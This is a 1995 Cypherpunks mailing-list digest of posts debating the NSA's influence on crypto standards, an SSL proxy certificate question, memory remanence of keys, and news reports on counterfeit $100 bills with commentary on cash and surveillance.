* Long, long ago, in a tagline far far away...
--- * Monster at FAmend.Com *

From stewarts at ix.netcom.com Mon Sep 4 18:30:48 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 4 Sep 95 18:30:48 PDT
Subject: (NOISE) Re: e$: More fun with cash: Senate Bill 307
Message-ID: <199509050127.SAA14037@ix9.ix.netcom.com>

>I had heard that it was the Colombians, branching out from the cocaine
>business with those fancy new copy machines, which are supposed to be
>able to duplicate the blue & red threads in US currency paper.

But if the government was _serious_ about supply-side drug-trade reduction, wouldn't they _encourage_ this sort of thing? After all, that way the Colombians can make as much money as they do today without the bother of hauling all that white powder into the US? :-) (Sure, it's a cypherpunk topic, after all real crypto is mainly about economics and threat analysis :-)

>See, when the GOVERNMENT spends money, it creates jobs; whereas
>when the money is left in the hands of TAXPAYERS, God only knows
>what they do with it. Bake it into pies, probably. Anything to
>avoid creating jobs. -- Dave Barry

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From vznuri at netcom.com Mon Sep 4 18:56:52 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Mon, 4 Sep 95 18:56:52 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509041641.KAA26589@bvsd.k12.co.us>
Message-ID: <199509050153.SAA23364@netcom17.netcom.com>

>> understand marketing or human psychology. Clipper, the closest the
>> agency has come to creeping out of the darkness of their coffin,
>> was a total fiasco. the self-destructing director of NSA whats-his-name
>> who was running for that FBI position or whatever is another example of how
>> the inbred spook society has difficulty dealing with anything outside
>> their artificial reality.
>
>I think you are dead wrong. The NSA has mastered the market psychology.
>Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS...
>the NSA has had a hand in them all. DES is by far the most popular cipher,
>popular enough that it will take years and years to switch to something new.

no, I think the NSA is very adept at infiltrating and twisting existing cryptographic market processes to suit their own ends. DES is a good example of this. it was created by IBM largely, and then "manipulated" by the NSA. this is well known and understood. the NSA does not work with standards or markets so much as *interfere* with them. how can you deny this basic premise embraced by virtually everyone on this list?

>As for the clipper "fiasco," I would argue that it was an excellent marketing
>move. The NSA is aware that there is only a very very small percentage of
>society that thinks about crypto, with the internet and what have you it is now
>possible for this minority to be heard, the NSA proposes clipper, and so we all
>bitch about it because it's only secure against non-government attacks. Now
>the public hears this and resists clipper. There isn't another product that is
>winning support that clipper could have had. You step back and look at it, and
>the public is exactly where they were 5 years ago, no crypto.

clearly, the first attempt was to get the public to embrace clipper. lacking that, they have thwarted natural market progression. I agree they have done this. but it's like making a pool shot accidentally and saying, "I meant to do that". the NSA is *not* an agency that has a single clue about *real* markets. they do have a brilliant ability to leverage their political coercion skills to the absolute maximum to *manipulate* and *interfere* and *piss on* newly growing markets. the NSA has screwed up public crypto in uncountable ways. you cannot deny this!! they secretly visit people doing state-of-the-art research and intimidate them into silence or going other directions.
they visited Mosaic designers to tell them that the things they were installing in the software were not acceptable legally. of course, any other legal arm of the government would simply sue once the software appeared, but not try to manipulate the design prior to its release. this is the tactics of an *espionage* and *intelligence* agency. surprise!! to say that the NSA understands markets is like saying that thieves understand how to pick pockets. yeah, that's true, but that's not quite how I would have put it.

>Clipper was a no lose situation for them, if it is adopted only they can read
>all transactions made with it, if it isn't adopted, everybody can read all
>transactions, they didn't lose anything.

huge amounts of cash and credibility have been WASTED on it. the NSA has lost enormous credibility because of this fiasco. furthermore, the way they tried to hide behind presidential directives is absolutely repugnant to anyone who has a belief in the separation of powers within our government.

>They have some top minds working for them,

I know, it's a pity they don't get more respectable and socially fulfilling jobs at companies, where they can be publicly rewarded and recognized for their brilliance.

>it's been proven that they have been
>a few steps ahead of the public for a long time; it's foolish to think they
>don't understand the psychology of the market.

they *do* understand the market, only to the extent that they are trying to successfully SABOTAGE what would regularly be its natural growth. they have been ahead in *theoretical* knowledge, but it was precisely my *point* that this nebulous eggheadism has demonstrably exploded when placed in public scrutiny. do you realize the sheer ability of Microsoft to build software that succeeds in *markets*? Microsoft doesn't care much about Netscape because, as one microsoft engineer remarked, "well, it's strange to talk about market share when you are giving away software for free".
well, the NSA is the absolute *opposite* of Microsoft. they don't have a *clue* about true market forces. they do however understand ways in which the government interferes with markets, and they seize on every one of those mechanisms as their lifeblood for control and "shadow/invisible oppression".

>Just as the public starts to
>desire something like public key crypto, they can publish a standard on it
>and it is likely to be adopted.

the NSA is quickly losing relevance. the public *does* desire public key crypto, and a de facto standard *has* been created, it's called PGP. if the NSA proposes something in public key areas, it is likely to be pissed on by the public as much as Clipper, in many ways because of the failure of Clipper. clipper in a big sense *was* the NSA's first step toward public key encryption, and it was widely trounced on. face it dude, the NSA has shown far less competence in the public arena than *any* apologist such as yourself can ever demonstrate.

From adam at bwh.harvard.edu Mon Sep 4 19:46:28 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Mon, 4 Sep 95 19:46:28 PDT
Subject: SSLRef (SSLtelnet)
In-Reply-To: <199509031948.MAA17974@jobe.shell.portal.com>
Message-ID: <199509050246.WAA14488@bwh.harvard.edu>

To get a certificate, you need to talk to Verisign, and give them a business plan, a key, and 270 bucks per year to get your key certified. Verisign is a spin off of RSA.

| The stumbling block is that Netscape won't connect to even the local
| proxy unless it sees a valid certificate, one signed by a CA that it
| accepts. For this application I would need such a certificate, and make
| the corresponding public and private keys public, hard-coding them into
| the proxy. Since the proxy runs on the same PC as the browser there is
| no need for confidentiality between them, and the secret key can be
| revealed.
|
| Does anyone have an idea for a way to acquire a certificate acceptable to
| Netscape, perhaps one with a "broken key", that could be used for this
| purpose?
|
| Hal
|

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From edgar at highnrg.sbay.org Mon Sep 4 20:19:31 1995
From: edgar at highnrg.sbay.org (Edgar Swank)
Date: Mon, 4 Sep 95 20:19:31 PDT
Subject: SecureDrive 1.4 Announcement Correction
Message-ID:

It has been brought to my attention that the phone number supplied to me by Michael Paul Johnson for his Catacombs BBS which appeared here in a previous announcement was incorrect. The correct number is 303-772-1062. Other information in the announcement is correct.

Edgar Swank
SecureDrive Co-Author

---
edgar at HighNRG.sbay.org Keep Freestyle Alive!

From monty.harder at famend.com Mon Sep 4 20:44:01 1995
From: monty.harder at famend.com (MONTY HARDER)
Date: Mon, 4 Sep 95 20:44:01 PDT
Subject: Emergency File Wipe Algorithm
Message-ID: <8B074DD.00030003EA.uuout@famend.com>

CW> and relaxation are in the same order of magnitude. Thus, a few microseconds of
CW> storing the opposite data to the currently stored value will have little effect
CW> on the oxide. Ideally, the oxide should be exposed to as much stress at the

Here is a simple way to handle the problem, using our old discredited friend, XOR. Set up your software to periodically XOR the key with FFFF. This way, each bit will be a 0 half the time, and a 1 the other half. You have a flag that tells whether the key is in normal or inverted form, so that you can quickly perform any necessary computations on it, but there should not be any long-term memory effect.
* Free will made me do it!
--- * Monster at FAmend.Com *

From unicorn at access.digex.net Mon Sep 4 20:44:48 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Mon, 4 Sep 95 20:44:48 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID:

I have received a pile of requests for citations. Here are segments of a few. As I typed them all by hand, errors are likely to be mine. My comments follow the articles, so you can stop reading just before them :)

###The San Francisco Examiner
March 7, 1995 - Tuesday
Global Counterfeiting traced to Tehran

[...]

For the past five years, so called superbills, crisp $100 Federal Reserve Notes, so perfectly forged that they might be fresh off U.S. government printing presses, have been flooding banks and money markets around the world. The total amount currently in circulation is believed to be $10 Billion or more.

Currency officials alarmed.

Alarmed Treasury and Federal Reserve Board officials fear the increasing number of such superbills has shaken international confidence in America's currency.

[...]

From the moment the new superbills surfaced in 1989, it was clear to the secret service... that these were no ordinary forgeries. Under microscopic examination, they showed only infinitesimal differences from legitimate notes. Most significant, the counterfeits had been printed on presses virtually identical to those used at the Bureau of Engraving and Printing. Secret service investigators concentrated on those nations that had acquired the same kind of intaglio presses. Only two companies sold them on the international market. One was a U.S. company, none of whose overseas customers was considered suspect. The second was a Swiss company, De La Rue Giori.

Evidence pointed to Iran

By the end of 1991, investigators had eliminated all but one of Giori's clients: the Islamic Republic of Iran.

[...]
Intelligence agencies uncovered evidence that Iran was not only mass-producing the notes, but had built a world-wide distribution network. Key transshipment points had been established in Lebanon, Syria, Sudan, and North Korea. Ronald de Valderano of Britain's Research Foundation for the Study of Terrorism says practically every Iranian-backed terrorist cell in the world is at least partially supported by the forgeries. The notes most often are used to buy arms or pay operating expenses or are sold on the currency black markets for legal cash. Indeed, when FBI agents searched the residence of suspects arrested for the bombing of New York's World Trade center, they found $20,000 of the forgeries.

[...]

Critics have for years urged that U.S. currency be better protected against such onslaughts. Last July, the treasury finally announced that changes were planned for U.S. currency, including covert security features.

[...]

###The Independent
June 19, 1995 - Monday
'Perfect dollar forgeries flood Middle East; The Israeli and Iranian governments top the list of suspects behind the faultless $100 bills.
Robert Fisk

The Lebanese know how to spot a fake. Fake weapons, fake perfumes, fake diplomatic consuls, fake money. But the latest US $100 bills are as near perfect forgeries as they have seen, many of them accepted happily by Beirut's notoriously suspicious money changers.

[...]

The bills, dated 1988 but probably forged in Lebanon in the following two years - the last two years of the civil war - are still arriving at the Allied Business Bank at the rate of one a month, often brought in from Cyprus or other Middle East states by Arab clients unaware that they are forged.

[Laws of most middle eastern countries make perfect forgeries a capital crime]

"Anyone who makes a 'perfect' dollar bill out here is going to get strung up if he's caught," another bank official said.
"So the guys who're going to make a perfect note, without any mistakes, are working for a government who will protect them. So a government must be involved, the intelligence services, ministries, the lot." A senior bank official in Lebanon believed that Iran or Israel might be responsible. "When you're producing this kind of high- tech stuff, it's got to have official backing," he said. "If you're spending this kind of money on a 'perfect' forgery, it's for big business - for political parties, arms purchases, for paying militias." He repeated a rumour believed by several other banking officials in Lebanon - that the "perfect" dollars might be coming off counterfeit presses and dollar plates taken into Afghanistan by the Soviet intelligence service during the Soviet occupation; Afghanistan is now divided among militias respectively funded by Saudi Arabia and Iran. [...] "The security thread is the reason why we are alarmed," the senior Lebanese bank official said of the new forgeries. "It's not easy to get the thread in. You put in the thread when you produce the note - it's not printed on, it's embedded in the paper. And it's a real security thread. "We suspect they're being exported to a variety of places: to the US, to the former Soviet Union...." Other bank officials suspect Iran... and suggest that Tehran has used fake currency bills to fund the Hizbollah, Hamas and other armed groups which are opposed to Israeli occupation. ###The Washington Post May 05, 1995 - Friday, Final edition Bogus Bills?; Rumors Persist That Iran Is Counterfeiting U.S. Currency to Sabotage the Economy. Thomas. W. Lippman [...] The allegation that Iran is waging economic warfare against the United States by printing and distributing millions of dollars in phony U.S. currency has been circulating on Capitol Hill at least since 1992, when it was made by a House Republican Task Force on Terrorism and Unconventional Warfare. It might even be true or partly true, according to some sources. 
There is a problem with counterfeit greenbacks around the world, these sources said. It's just not clear that Iran is responsible for it.

The question arose again Tuesday when the irrepressible Rep. Dana Rohrabacher (R-Calif.) asked Assistant Secretary of State Robert Pelletreau about it in an International Relations Committee hearing on the Clinton administration's economic boycott of Iran. Rohrabacher, who spent much of the recent congressional recess traveling in Asia, said he heard about the phony money from many people.

"Have you received any credible reports that the Iranians are counterfeiting American money?" he asked.

Pelletreau, a normally unflappable career diplomat, looked uncomfortable. "I know there is an intense investigation and campaign underway, led by the U.S. Secret Service to uncover all the sources of counterfeiting of American money abroad," he said. "I just am personally not in a position to give you the exact details of what we believe Iranian involvement is in that."

"There are many leaders throughout the world... who believe that the American currency is being undermined by an intentional act of economic warfare on the part of the Iranian government... by counterfeiting billions of dollars' worth of U.S. currency," Rohrabacher said. "Am I getting you right that basically you're not denying that this is going on?"

"I am not denying it," Pelletreau said.

The 1992 GOP report said the fake currency is being printed in the Iranian mint in Tehran, "using equipment and know-how purchased from the U.S. during the reign of the Shah," which ended in 1979.... A Wall Street Journal report at the time said that the phony bills-- whoever was making them-- were so good they could fool sophisticated currency-handling equipment at the Federal Reserve.

###Counterfeiting and Money Laundering Deterrence Act of 1995
Patrick Leahy

I rise today to introduce the Counterfeiting and Money Laundering Deterrence Act of 1995.

[...]
A number of analysts believe the threat to the U.S. currency is urgent. News reports say that intelligence experts in the U.S. and Israel are aware of a highly skilled group of counterfeiters operating out of Lebanon's Bekaa Valley. The counterfeiters, controlled by Syria and Iran, have turned out as much as $1 billion of the extremely high-quality reproductions of the U.S. $100 bill.

[...]

First, the bill requires all existing $100 denomination U.S. currency to be exchanged within a 6-month period. This would make drug traffickers who hoard vast amounts of hard currency hard-pressed to convert their existing cash into the new money. If they cannot exchange their funds in the specified time frame, their funds are worthless under the bill.

[...]

Second, the bill establishes two new versions of the $100 bill: one for use at home and one for use abroad. The only business that relies on exporting large amounts of hard currency is drug trafficking. This provision would make money smuggled out of the United States worthless, turning the tables on drug traffickers who covertly move money from the streets of this country to foreign bankers who launder it without reporting illicit transactions to the Treasury. A U.S. citizen traveling abroad who wished to bring $100 currency with him would hardly be inconvenienced by this measure: a quick stop at a U.S. bank to convert their greenbacks into differently-colored foreign-use bills would be all that is necessary-- just like purchasing travelers' checks. The only ones who would be inconvenienced would be drug traffickers who would hate to exchange their greenbacks for foreign use currency at a U.S. bank because of currency transaction reporting requirements.

[...]

### END ARTICLES

The presence of counterfeit bills, the legislation to defeat them, and the general sentiment of government in the matter is disturbing for a few reasons.

1. Focus on Surveillance

The legislation adopted to defeat counterfeiting is linked with the four horsemen quite closely. The solution, instead of making the bills difficult to forge like they should have been in the first place (U.S. bills are currently the easiest to forge of western nations - and counterfeit bills are long lived as currency changes are unheard of in the U.S.) is to create a regime where an additional tier of reporting is required. It seems the first answer to every "problem" (read: every element which might allow citizen autonomy) now is to link it to money laundering and terrorism and drop a blanket solution over it which without fail includes high-level reporting or tracking elements. (Anyone seen this before with the... oh, I dunno, strong encryption issue?)

2. The demonization of cash.

I have written here before on the increasing difficulty with which one uses cash without suspicion in the United States. It has come to the point where money, in any amount, won't buy you everything anymore. Many products and services are available ONLY by credit or credit card - and by extension, available only to traceable transactions. Is it any wonder Americans have one of the lowest ratios of income to debt in the world today? "They" would have you believe that cash is nothing but a tool for the four horsemen. I am most disturbed in this context by the way the act is financed - i.e. by the extinguished obligations from unexchanged currency. Does this measure sound ominous to anyone but me?

3. The corruption of e-cash to further the above.

If the government is disturbed by the laundering of money enough to actually print, or even propose printing, two kinds of currency, how will they respond to untraceable, unaccountable and infinitely liquid e-cash? I think the answer is in past behavior: e-cash will be linked to the four horsemen and subjected to rigorous reporting requirements - systems which are true e-cash will be banned.
At the same time the widespread presence and use of e-cash will be used to question anyone who uses physical currency. The death of cash continues as it were. Why would anyone carry bills anymore when a plastic smartcard (or your highschool ring) is so much more convenient? You must have something to hide. No, good citizen units will WANT to use "e-cash" because they are honest, and know the government means them no harm and is here to protect them from the four horsemen.

The cash is dead, long live the king.

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig!
*New Key Information* - Finger for key revocation and latest key update.

From jamesd at echeque.com Mon Sep 4 20:48:12 1995
From: jamesd at echeque.com (James A. Donald)
Date: Mon, 4 Sep 95 20:48:12 PDT
Subject: A problem with anonymity
Message-ID: <199509050347.UAA09032@blob.best.net>

At 06:40 PM 9/2/95 +1300, David Murray wrote:
> I still think that, because of
> the (perfect) ease with which net.rep's are transferrable/cash-in-able,
> the chances you take in the digital domain are so much higher as to be
> (almost?) qualitatively different.

Then good names will have sufficient cash value, that their owners will be deeply reluctant to damage those good names. Obviously if one can obtain a good name cheaply, then it might be profitable to misuse it. In which case we swiftly run short of good names, and they become expensive.

---------------------------------------------------------------------
| We have the right to defend ourselves | http://www.jim.com/jamesd/
| and our property, because of the kind |
| of animals that we are. True law      | James A. Donald
| derives from this right, not from the |
| arbitrary power of the state.         |
| jamesd at echeque.com

From jsimmons at goblin.punk.net Mon Sep 4 20:51:06 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Mon, 4 Sep 95 20:51:06 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509050153.SAA23364@netcom17.netcom.com>
Message-ID: <199509050348.UAA19868@goblin.punk.net>

>
>
> >> understand marketing or human psychology. Clipper, the closest the
> >> agency has come to creeping out of the darkness of their coffin,
> >> was a total fiasco. the self-destructing director of NSA whats-his-name
> >> who was running for that FBI position or whatever is another example of how
> >> the inbred spook society has difficulty dealing with anything outside
> >> their artificial reality.
> >
> >I think you are dead wrong. The NSA has mastered the market psychology.
> >Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS...
> >the NSA has had a hand in them all. DES is by far the most popular cipher,
> >popular enough that it will take years and years to switch to something new.
>
> no, I think the NSA is very adept at infiltrating and twisting existing
> cryptographic market processes to suit their own ends. DES is a good example
> of this. it was created by IBM largely, and then "manipulated" by the
> NSA. this is well known and understood. the NSA does not work with standards
> or markets so much as *interfere* with them. how can you deny this basic
> premise embraced by virtually everyone on this list?
>

The NSA doesn't really bother me all that much, because all they've managed up to now is to slow things down (by about 3 hrs. in the case of PGPhone). But what happens when someone who HAS mastered market psychology gets into the game?

Here's a prediction: within one year, we will see the advent of Micro$oft's "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by Micro$oft itself, or a flat-out trap door.
ANY communications with a Windoze box or network will have to use it, or lose the market. About the same time, Justice will suddenly 'lose interest' in its various investigations of M$. Micro$oft will probably give it away for free as part of the Windows 95.702 upgrade.

At this point, the NSA's 'speed bump' becomes Micro$oft's 'brick wall'. And while some of us will continue to use PGP and other strong crypto, the average American will have kissed off ALL of her privacy to the tune of "... you make a grown man cry."

--
Jeff Simmons jsimmons at goblin.punk.net

From unicorn at access.digex.net Mon Sep 4 21:01:44 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Mon, 4 Sep 95 21:01:44 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509050348.UAA19868@goblin.punk.net>
Message-ID:

On Mon, 4 Sep 1995, Jeff Simmons wrote:

> Date: Mon, 4 Sep 1995 20:48:51 -0700 (PDT)
> From: Jeff Simmons
> To: cypherpunks at toad.com
> Subject: Re: NSA says Joe Sixpack won't buy crypto
>
> Here's a prediction: within one year, we will see the advent of Micro$oft's
> "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by
> Micro$oft itself, or a flat-out trap door. ANY communications with a
> Windoze box or network will have to use it, or lose the market.

It's here already. It's called "lotus notes."

> About the
> same time, Justice will suddenly 'lose interest' in its various
> investigations of M$. Micro$oft will probably give it away for free as part
> of the Windows 95.702 upgrade.

Wait a few months. Justice is boring of the investigation even now.

> --
> Jeff Simmons jsimmons at goblin.punk.net
>

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig!
*New Key Information* - Finger for key revocation and latest key update.

From ian at bvsd.k12.co.us Mon Sep 4 21:16:04 1995
From: ian at bvsd.k12.co.us (Ian S. Nelson)
Date: Mon, 4 Sep 95 21:16:04 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509050153.SAA23364@netcom17.netcom.com>
Message-ID: <199509050415.WAA05593@bvsd.k12.co.us>

> no, I think the NSA is very adept at infiltrating and twisting existing
> cryptographic market processes to suit their own ends. DES is a good example
> of this. it was created by IBM largely, and then "manipulated" by the
> NSA. this is well known and understood. the NSA does not work with standards

Well known that the NSA manipulated DES? How so? I am willing to believe that they had a lot of say in it and they probably wanted it weakened, but I think you'll be very hard pressed to find proof of that. Based on some of the analysis of lucifer, it could be said that IBM weakened the key space too because that was a side effect of adding strength to the overall cipher. Keyspace is just about the only weakness of DES, I don't think that can be said about lucifer.

> or markets so much as *interfere* with them. how can you deny this basic
> premise embraced by virtually everyone on this list?

Interference is just noise, the NSA has pretty much pushed the market where they want it to go. If you think that is just "interference" then we use the word differently.

> clearly, the first attempt was to get the public to embrace clipper. lacking
> that, they have thwarted natural market progression. I agree they have
> done this. but it's like making a pool shot accidentally and saying,
> "I meant to do that". the NSA is *not* an agency that has a single clue
> about *real* markets. they do have a brilliant ability to leverage their
> political coercion skills to the absolute maximum to *manipulate* and
> *interfere* and *piss on* newly growing markets.

If they are as powerful as we both seem to think (easily "interfering" with markets and screwing the public for decades) how can you underestimate them like that?
If they are actually spying on us, then they know what moves we'll make and they can always head that off, it's not slop pool. If they aren't then I don't know what I'm supposed to hold against them, I don't have to use their standards unless I wish to export stuff.

> the NSA has screwed up public crypto in uncountable ways. you cannot deny this!! they secretly

This is true, they make long term industry standards that are short lived. DES's keyspace was far too small. Escrow isn't a great idea (except for signatures). ITAR is bullshit.

> visit people doing state-of-the-art research and intimidate them into silence or going other directions. they visited Mosaic designers to tell them that the things they were installing in the software were not acceptable legally. of course, any other legal arm of the government would simply sue once the software appeared, but not try to manipulate the design prior to its release. this is the tactics of an *espionage* and *intelligence* agency. surprise!!

This is all hearsay. I doubt that the mosaic designers have had any contact with the NSA unless they invented a significant new cryptographic technology, all Netscape/Mosaic have done is implement existing technology. They even implemented SSL with the 40-bit exportable key size using rc4, which is what the law says you are supposed to do. Any netscape employees want to dispute this and tell me about your encounters with the NSA?

> huge amounts of cash and credibility have been WASTED on it. the NSA has lost enormous credibility because of this fiasco. furthermore, the way they tried to hide behind presidential directives is absolutely repugnant to anyone who has a belief in the separation of powers within our government.

They have only lost credibility to the cryptographic community, where they already had very little credibility. This is the point that we all tend to overlook.
Joe SixPack doesn't know much about the NSA or cryptography; when first told about them he tends to think that they are there to protect him and doesn't think of them as an enemy. The biggest accomplishment of the clipper thing is that nobody (very few at least) are using secure public key crypto and the few new people to the issue have no idea who to trust now. If their job is to listen to transmissions, then their money was well spent because there aren't many secure transmissions right now. And since everybody is scared about it there aren't likely going to be a lot of secure transmissions real soon.

> do you realize the sheer ability of Microsoft to build software that succeeds in *markets*? Microsoft doesn't care much about Netscape because, as one microsoft engineer remarked, "well, it's strange to talk about market share when you are giving away software for free". well, the NSA is the absolute *opposite* of Microsoft. they don't have a *clue* about true market forces. they do however understand ways in which the government interferes with markets, and they seize on every one of those mechanisms as their lifeblood for control and "shadow/invisible oppression".

I disagree, the NSA and MS have a lot in common, they both have defined shoddy standards that we are all using for one part of our life or other. We will have to put up with both of them for a long time and both of them are anticompetitive. If market forces were so much more powerful than the NSA can understand, then why the hell are all the banks in the world depending on DES?

> the NSA is quickly losing relevance. the public *does* desire public key crypto, and a defacto standard *has* been created, it's called PGP. if the NSA proposes something in public key areas, it is likely to be pissed on by the public as much as Clipper, in many ways because of the failure of Clipper.
> clipper in a big sense *was* the NSA's first step toward public key encryption, and it was widely trounced on.

The NSA is only losing relevance with us, how many average folks even know what clipper was? We could even disregard the average people and just ask the computer users, how many of those 80 million windows users know about clipper? If it is enough for the NSA to "lose relevance" I would think this list would be many times larger than it is.

> face it dude, the NSA has shown far less competence in the public arena than *any* apologist such as yourself can ever demonstrate.

I take offence at that, I am not an apologist, I'm just trying to show the other side. We can't fight the NSA if we are all blind to what they do in the general public's eyes. For what it's worth, I can't think of a major commercial product that uses cryptography that hasn't had the NSA's hands in it; that is pretty damn competent if you ask me.

From hfinney at shell.portal.com Mon Sep 4 21:19:00 1995
From: hfinney at shell.portal.com (Hal)
Date: Mon, 4 Sep 95 21:19:00 PDT
Subject: SSLRef (SSLtelnet)
Message-ID: <199509050417.VAA05211@jobe.shell.portal.com>

From: Adam Shostack
> To get a certificate, you need to talk to Verisign, and give them a business plan, a key, and 270 bucks per year to get your key certified.
>
> Verisign is a spin off of RSA.

Yes, this is my understanding. I have also heard that the process is not easy or routine, that the business plan receives considerable scrutiny. What I would be doing with the certificate is unconventional. I would publicize the secret key, and ship out free software which would use the certificate to establish SSL communications with the Netscape browser within the same PC that runs the browser. The real purpose of the certificate is not to authenticate the key of a server running remotely, but simply to bypass the security checks within Netscape Navigator. So I am not confident that this business plan will pass Verisign's muster.
Among other things, it would be difficult to enforce the one year restriction (unless Navigator checks a date in the certificate). I understand that Netscape's browser will also accept certificates created by a Netscape-internal "test" CA. I hoped that perhaps some junk certificates from that CA might be floating around, ones which would be useless for conventional purposes because their secret keys are exposed, but which would be perfect for my needs.

There is one "fallback" strategy possible which would allow the 128-bit SSL security proxy to work. That is to filter *all* connections, not just secure ones, and convert https: URL's to http:. Then Navigator will not attempt to make any SSL connections at all, and the proxy can talk to it non-securely, using 128-bit SSL for the external connection to the server. However this would be much harder, and the proxy would have to somehow remember which URL's had been massaged like this so it would know which ones are eligible to have secure connections made.

Hal

From tn0s+ at andrew.cmu.edu Mon Sep 4 21:31:28 1995
From: tn0s+ at andrew.cmu.edu (Timothy L. Nali)
Date: Mon, 4 Sep 95 21:31:28 PDT
Subject: Emergency File Wipe Algorithim
In-Reply-To: <8B074DD.00030003EA.uuout@famend.com>
Message-ID:

Excerpts from internet.cypherpunks: 4-Sep-95 Re: Emergency File Wipe Alg.. by MONTY HARDER at famend.com

> CW> and relaxation are in the same order of magnitude. Thus, a few microseconds of
> CW> storing the opposite data to the currently stored value will have little effect
> CW> on the oxide. Ideally, the oxide should be exposed to as much stress at the
>
> Here is a simple way to handle the problem, using our old discredited friend, XOR. Set up your software to periodically XOR the key with FFFF. This way, each bit will be a 0 half the time, and a 1 the other half.
> You have a flag that tells whether the key is in normal or inverted form, so that you can quickly perform any necessary computations on it, but there should not be any long-term memory effect.
>

On today's machines, it's a little more complicated than that. After you XOR the key, you have to then flush all the cache lines that contain the key, to make sure that the XOR operation makes it to the main memory. Unless I'm mistaken, a write-back cache will not propagate the XOR operation to main memory unless some other memory operation bumps the XORed key out of cache memory. Successive XOR operations on the key won't necessarily do this; you need some other memory op to flush the cache lines.

_____________________________________________________________________________
Tim Nali \ "We are the music makers, and we are the dreamers of
tn0s at andrew.cmu.edu \ the dreams" -Willy Wonka and the Chocolate Factory

From wilcoxb at nag.cs.colorado.edu Mon Sep 4 22:12:29 1995
From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox)
Date: Mon, 4 Sep 95 22:12:29 PDT
Subject: article/author ratings/reputations (was Re: pseudonyms & list health)
In-Reply-To: <9509040614.AA01461@cs.umass.edu>
Message-ID: <199509050512.XAA08518@nag.cs.colorado.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Futplex sez:
>
> A reviewer named Susan Granger, for example, is known to me as a person who routinely lauds lousy movies. Thus it's simple for me to ignore her positive recommendations (I've yet to see a negative review from her). In fact, when I observe that a new film prominently features her seal of approval in its advertising, I take that fact as an indication of the lack of praise from more discriminating reviewers. So a nominal "positive" credential may be interpreted as an implicit negative credential, depending upon context.
>
> OTOH, if I only give digital thumbs-up to a couple of people on the list, those who consider me a reputable appraiser-of-cpunks should find the information relatively useful. I'm sure I can manage to be a harsher critic than your 2nd-grade teacher :} Using e.g. a single 1-10 scale would be highly practical for such purposes, IMHO.

There are people working on an extension of UseNet to allow each reader to publish ratings which propagate in the same way that articles do. These ratings can be of specific articles, of threads or of authors. Your newsreaders can rank the articles and present them to you in highest-to-lowest ranked order, or kill all those below a certain mark, or some such. The heuristic that the researchers originally started with was "if I agreed with so-and-so in the past then I'll probably agree with him again." (Personally I would rather have some degree of manual control over my ratings-weightings. My good friends automatically get more weight than people I don't know, regardless of how much our ratings coincide. Similarly I might want to downgrade certain net.assholes just out of a sense of justice, even if they recommend good articles usually. :-) )

Unfortunately I have lost the URL for this wonderful experiment. Hopefully the fruits of their labors will become publicly available soon. I will certainly be one of the first to sign up to distribute ratings and to listen to (some) other people's.

Bryce

signatures follow: + public key on keyservers /.
island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---*

From wilcoxb at nag.cs.colorado.edu Mon Sep 4 22:15:38 1995
From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox)
Date: Mon, 4 Sep 95 22:15:38 PDT
Subject: Wearing RSA shirt to school
In-Reply-To: <199509041203.IAA38469@tequesta.gate.net>
Message-ID: <199509050515.XAA08896@nag.cs.colorado.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Note failed signature. Great Dave Barry quote, by the way. :-)

Bryce

******* rest of message is file included by Bryce

- -----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:
>At 4:43 AM 9/4/95, Futplex wrote:
>>I wrote:
>>> With respect to possession within the U.S., there aren't any laws stopping you from waving strong cryptography around wherever you like (at least, not yet).
>>
>>----
>>...and in private email, Jim Ray pointed out that showing the shirt to a foreign national might technically violate ITAR...
>
>Nope, no more so than letting a foreign national read Schneier's book is a violation of the ITAR. If you dispute this, ask whether Schneier's book is banned from export (the book, not the optional diskette). It isn't. Nor are other cryptography _books_ banned from export.

The law doesn't have to be consistent, or to make sense, or be enforced evenhandedly. The law is, after all, not written, or interpreted, or enforced, by partisan Libertarians like me. My private email to Futplex said *may* violate... and I stand by it. [IANAL, though.] Whether or not a law as incontrovertibly stupid as ITAR is enforced may depend on the timing of the next election, as we seem to be witnessing in the limbo-state of PRZ.
